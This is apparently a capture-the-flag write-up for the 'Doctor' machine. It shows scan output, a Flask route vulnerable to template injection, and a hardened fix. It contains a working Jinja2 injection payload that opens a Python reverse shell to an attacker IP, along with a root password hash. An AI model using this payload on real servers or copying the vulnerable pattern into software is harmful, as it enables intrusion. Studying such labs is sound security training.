Doctor
```
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-02 09:27 EST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.45% done; ETC: 09:29 (0:01:20 remaining)
Nmap scan report for 10.10.10.209
Host is up (0.032s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
| ssh-hostkey:
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http
|_http-title: Doctor
8089/tcp open  unknown
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27

Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds
```

```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.209:8089
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/02 09:33:15 Starting gobuster
===============================================================
/services (Status: 401)
/v2 (Status: 200)
/v1 (Status: 200)
/v3 (Status: 200)
/v4 (Status: 200)
/v5 (Status: 200)
/v6 (Status: 200)
/v7 (Status: 200)
/v8 (Status: 200)
/v10 (Status: 200)
/v11 (Status: 200)
/v15 (Status: 200)
/v0 (Status: 200)
/v01 (Status: 200)
/v52 (Status: 200)
/v001 (Status: 200)
/v23 (Status: 200)
/v9 (Status: 200)
/v14 (Status: 200)
/v20 (Status: 200)
/v05 (Status: 200)
/v13 (Status: 200)
/v12 (Status: 200)
/v92 (Status: 200)
/v003 (Status: 200)
/v209 (Status: 200)
===============================================================
2020/12/02 09:34:19 Finished
===============================================================
```

```
[+] Url:            http://doctors.htb
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/02 10:07:32 Starting gobuster
===============================================================
/account (Status: 302)
/logout (Status: 302)
/archive (Status: 200)
/login (Status: 200)
/register (Status: 200)
/home (Status: 302)
/reset_password (Status: 200)
===============================================================
2020/12/02 10:12:18 Finished
===============================================================
```

```
<div data-gb-custom-block data-tag="for"><div data-gb-custom-block data-tag="if" data-0='warning'>{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.131\",3254));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\"]);'").read().zfill(417)}}</div></div>
```

```python
from flask import render_template, render_template_string, request, Blueprint
from flask_login import current_user, login_required
from flaskblog.models import Post

main = Blueprint('main', __name__)


@main.route("/")
@main.route("/home")
@login_required
def home():
    page = request.args.get('page', 1, type=int)
    posts = Post.query.order_by(Post.date_posted.asc()).paginate(page=page, per_page=10)
    return render_template('home.html', posts=posts, author=current_user)


@main.route("/archive")
def feed():
    posts = Post.query.order_by(Post.date_posted.asc())
    tpl = '''
    <?xml version="1.0" encoding="UTF-8" ?>
    <rss version="2.0">
    <channel>
    <title>Archive</title>
    '''
    for post in posts:
        if post.author==current_user:
            # post.title is concatenated into the template source itself,
            # so any Jinja2 syntax in a title is evaluated at render time.
            tpl += "<item><title>"+post.title+"</title></item>\n"
    tpl += '''
    </channel>
    '''
    # The user-influenced string is rendered as a template (SSTI).
    return render_template_string(tpl)
```

```
[+] Users with console
root:x:0:0:root:/root:/bin/bash
shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash
splunk:x:1003:1003:Splunk Server:/opt/splunkforwarder:/bin/bash
web:x:1001:1001:,,,:/home/web:/bin/bash
```

```
root:$6$384TbSO3bB1PWLT1$U8U.j.zBLXobhorPDxOMRZh4eE86lcn7C0dvqRvfJ9qDzreti8HDvXwFZccDat9/HJRNwu04ErVxo3mUwVbs5.:18512:0:99999:7:::
```
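The `feed()` route for `/archive` shown above builds its template source from `post.title`, so whatever a title contains is parsed as Jinja2. The following is an added example, not code from this page or from the application: it reduces that pattern to plain Jinja2 and sets it beside a fixed-template version that passes titles as data. The function names and sample titles are constructed, and `{{ 7*7 }}` is used only as a harmless marker.

```python
# Added example: the /archive pattern reduced to Jinja2, plus a hardened form.
# Function names and sample titles are constructed for illustration.
from jinja2 import Environment

# Flask autoescapes string templates; mirror that here.
env = Environment(autoescape=True)

HEADER = (
    '<?xml version="1.0" encoding="UTF-8" ?>\n'
    '<rss version="2.0">\n<channel>\n<title>Archive</title>\n'
)
FOOTER = "</channel>\n</rss>\n"


def feed_vulnerable(titles):
    """Same shape as feed(): titles become part of the template source."""
    tpl = HEADER
    for title in titles:
        tpl += "<item><title>" + title + "</title></item>\n"
    tpl += FOOTER
    # Jinja2 parses the titles as template code before rendering.
    return env.from_string(tpl).render()


# Hardened: the template text is a constant that never contains user input.
FEED_TEMPLATE = env.from_string(
    HEADER
    + "{% for title in titles %}"
    + "<item><title>{{ title }}</title></item>\n"
    + "{% endfor %}"
    + FOOTER
)


def feed_hardened(titles):
    """Titles are passed as data: never parsed as a template, and autoescaped."""
    return FEED_TEMPLATE.render(titles=titles)


# Constructed sample titles: a normal one, a template marker, and raw markup.
SAMPLE_TITLES = ["Hello", "{{ 7*7 }}", "<b>x</b>"]

if __name__ == "__main__":
    print(feed_vulnerable(SAMPLE_TITLES))  # marker is evaluated
    print(feed_hardened(SAMPLE_TITLES))    # marker stays literal text
```

In the Flask route the equivalent change is to keep the template text constant and call `render_template_string(tpl, posts=...)`, or to move the feed into a template file rendered with `render_template`.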